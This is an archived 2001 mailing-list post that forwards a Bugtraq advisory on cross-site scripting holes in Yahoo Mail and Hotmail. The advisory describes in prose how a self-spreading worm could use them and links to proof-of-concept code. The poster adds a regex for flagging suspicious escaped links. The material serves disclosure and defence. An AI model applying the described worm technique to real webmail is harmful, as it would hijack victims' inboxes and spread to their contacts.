Great Circle Associates List-Managers
(May 2001)
 

Indexed By Date: [Previous] [Next] Indexed By Thread: [Previous] [Next]

Subject: [mparcens @ hushmail . com: Yahoo/Hotmail scripting vulnerability, worm propagation]
From: Norbert Bollow <nb @ thinkcoach . com>
Date: Fri, 1 Jun 2001 01:00:40 +0200
To: list-managers @ greatcircle . com
Prefer-language: de, en, fr

Here is a new type of possible malware that is not stopped by
standard demime/attachment stripping.

I have just added a check for the regular expression

/https?:\S*(%3a|\:)(%2f|\/)(%2f|\/)/i

and messages which match this regexp will be bounced to the
moderators as containing a "Potentially malicious link".

You may want to consider doing the same.

Greetings, Norbert.


------- Start of forwarded message -------
X-From_: bugtraq-return-229-nb=thinkcoach .
 com @
 securityfocus .
 com  Thu May 31 18:38:05 2001
X-Envelope-To: <bollow @
 cyberlink .
 ch>
X-Real-To: <bollow @
 cyberlink .
 ch>
Mailing-List: contact bugtraq-help @
 securityfocus .
 com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq @
 securityfocus .
 com>
List-Help: <mailto:bugtraq-help @
 securityfocus .
 com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe @
 securityfocus .
 com>
List-Subscribe: <mailto:bugtraq-subscribe @
 securityfocus .
 com>
From: mparcens @
 hushmail .
 com
Date: Wed, 30 May 2001 19:18:08 -0500 (EDT)
To: bugtraq @
 securityfocus .
 com
Content-type: multipart/mixed; boundary="Hushpart_boundary_dAfMJfpqUApfpvnobyxrXSpSoIJaULVu"
Subject: Yahoo/Hotmail scripting vulnerability, worm propagation

- --Hushpart_boundary_dAfMJfpqUApfpvnobyxrXSpSoIJaULVu
Content-type: text/plain

Title: Yahoo/Hotmail scripting vulnerability, worm propagation


Synopsis

Cross-site-scripting holes in Yahoo and Hotmail make it possible to replicate 
a Melissa-type worm through those webmail services.


Description

An email is sent to the victim, who uses Yahoo Mail or Hotmail. Inside the 
email is a link to yahoo or hotmail's own server. The link contains escaped 
javascript that is executed when the page is loaded. That javascript then 
opens a window that could nagivate through the victim's inbox, sending messages 
with the malicious link to every email address it finds in the inbox. Because 
the malicious javascript executes inside a page from the mail service's 
own server, there is no domain-bounding error when the javascript is controlling 
the window with the victim's inbox.


Who is vulnerable

Users of the Yahoo Mail and Hotmail service. Although the exploit requires 
a user to click on a link, two things work for this exploit. (1) The email 
comes from a familiar user (sent by the worm), and (2) The link is to a 
familiar, trusted server. Theoretically, more services are vulnerable, due 
to the proliferation of these holes, but the worm is limited to web mail 
services.


Proof-of-Concept

Sample links and the worm code can be found at: http://www.sidesport.com/webworm/


Solution

Escaping all query data that is echoed to the screen eliminates this problem. 
This must be done on every page on a server that can send or read mail for 
the service.


Vendor Status

Both Yahoo and Hotmail were notified on May 23 2001.


- -mparcens
mparcens @
 hushmail .
 com

Free, encrypted, secure Web-based email at www.hushmail.com
- --Hushpart_boundary_dAfMJfpqUApfpvnobyxrXSpSoIJaULVu--


IMPORTANT NOTICE:  If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.
------- End of forwarded message -------


Indexed By Date Previous: Re: test messages etc
From: Tim Pierce <twp @ rootsweb . com>
Next:
From: (nil)
Indexed By Thread Previous: Re: Cute new hoax
From: Nick Simicich <njs @ scifi . squawk . com>
Next:
From: (nil)

Google
 
Search Internet Search www.greatcircle.com